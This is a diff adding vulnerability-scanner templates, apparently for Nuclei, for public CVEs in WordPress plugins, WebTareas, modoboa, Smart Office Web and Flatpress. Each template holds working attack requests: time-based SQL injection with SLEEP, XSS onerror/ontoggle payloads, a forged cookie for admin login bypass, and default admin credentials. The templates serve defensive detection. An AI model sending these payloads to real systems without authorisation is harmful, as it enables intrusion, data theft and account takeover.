- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_1>=7'
|
||||||
|
- 'len(body_1) == 0'
|
||||||
|
- 'status_code_1 == 302'
|
||||||
|
- 'contains(body_2, "Cryptocurrency Widgets Pack")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2022-4305
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Login as User or Customer < 3.3 - Privilege Escalation
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
|
||||||
|
remediation: Fixed in version 3.3
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4305
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-4305
|
||||||
|
cwe-id: CWE-269
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/login-as-customer-or-user"
|
||||||
|
tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: loginas_old_user_id=1
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html") && contains(content_type, "Dashboard")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: CVE-2022-44290
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/2
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44290
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-44290
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "text/html")
|
||||||
|
- contains(body, 'Delete the following?')
|
||||||
|
condition: and
|
|
@ -0,0 +1,61 @@
|
||||||
|
id: CVE-2022-44291
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44291
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-44291
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=6'
|
||||||
|
- 'len(body_2) == 0'
|
||||||
|
- 'status_code_2 == 302'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_1, "webTareasSID")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,166 @@
|
||||||
|
id: CVE-2022-44957
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebTareas 2.4p5 - Cross-Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
|
||||||
|
reference:
|
||||||
|
- http://webtareas.com/
|
||||||
|
- https://github.com/anhdq201/webtareas/issues/11
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-44957
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2022-44957
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,xss,webtareas,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /general/login.php?session=false HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
|
||||||
|
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
login
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginForm"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="passwordForm"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
-----------------------------3023071625140724693672385525
|
||||||
|
Content-Disposition: form-data; name="loginSubmit"
|
||||||
|
|
||||||
|
Log In
|
||||||
|
-----------------------------3023071625140724693672385525--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /clients/editclient.php? HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /clients/editclient.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="csrfToken"
|
||||||
|
|
||||||
|
{{csrf}}
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
|
add
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cown"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cn"
|
||||||
|
|
||||||
|
{{randstr}}<details/open/ontoggle=alert(document.domain)>
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="add"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="zip"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="ct"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="cou"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="wp"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="fa"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="url"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="curr"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="wc"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="pym"
|
||||||
|
|
||||||
|
1
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="pyt"
|
||||||
|
|
||||||
|
7
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="c"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="ssc"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="file1"; filename=""
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="attnam1"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="atttmp1"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061--
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- '<details/open/ontoggle=alert(document.domain)>'
|
||||||
|
- 'clients/listclients.php?'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="csrfToken" value="([0-9a-zA-Z]+)"'
|
||||||
|
internal: true
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-45365
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
|
||||||
|
reference:
|
||||||
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test
|
||||||
|
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability
|
||||||
|
- https://wordpress.org/plugins/stock-ticker/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-45365
|
||||||
|
remediation: Fixed in version 3.23.3
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-45365
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
publicwww-query: "/wp-content/plugins/stock-ticker/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Stock Ticker Fatal"
|
||||||
|
- "<IMG SRC=X ONERROR="
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2022-47075
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Smart Office Web 20.28 - Information Disclosure
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-47075
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2022-47075
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,smart-office,info,exposure
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ExportReportingManager.aspx"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "application/CSV")'
|
||||||
|
- 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-0334
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0334
|
||||||
|
remediation: Fixed in version 3.6.3
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/shortpixel-adaptive-images/"
|
||||||
|
tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2023-0600
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
|
||||||
|
remediation: Fixed in version 6.9
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-0600
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
public-www: "/wp-content/plugins/wp-stats-manager/"
|
||||||
|
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli
|
||||||
|
|
||||||
|
variables:
|
||||||
|
str: '{{rand_int(100000, 999999)}}'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 30s
|
||||||
|
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "sleep(10)")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2023-0602
|
||||||
|
info:
|
||||||
|
name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0602
|
||||||
|
- https://wordpress.org/plugins/twittee-text-tweet/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,66 @@
|
||||||
|
id: CVE-2023-0777
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: modoboa 2.0.4 - Admin TakeOver
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
|
||||||
|
remediation: update to version 2.0.4
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/
|
||||||
|
- http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-0777
|
||||||
|
cwe-id: CWE-305
|
||||||
|
cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"Modoboa"
|
||||||
|
fofa-query: body="Modoboa"
|
||||||
|
tags: modoboa,default-login
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /accounts/login/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /accounts/login/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /dashboard/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- password
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(content_type_3, "text/html")'
|
||||||
|
- 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
name: csrftoken
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- csrftoken=([A-Za-z0-9]+)
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: CVE-2023-0900
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
|
||||||
|
- https://github.com/WPPlugins/ap-pricing-tables-lite
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0900
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-0900
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
|
||||||
|
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_3>=5'
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "Security check")'
|
||||||
|
- 'contains(body_2, "ap-pricing-tables-lite")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-z]+)">Log Out'
|
||||||
|
internal: true
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-0947
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Flatpress < 1.3 - Path Traversal
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0947
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-0947
|
||||||
|
cwe-id: CWE-22
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.favicon.hash:-1189292869
|
||||||
|
tags: cve,cve2023,lfi,flatpress,listing
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/fp-content/"
|
||||||
|
- "{{BaseURL}}/flatpress/fp-content/"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
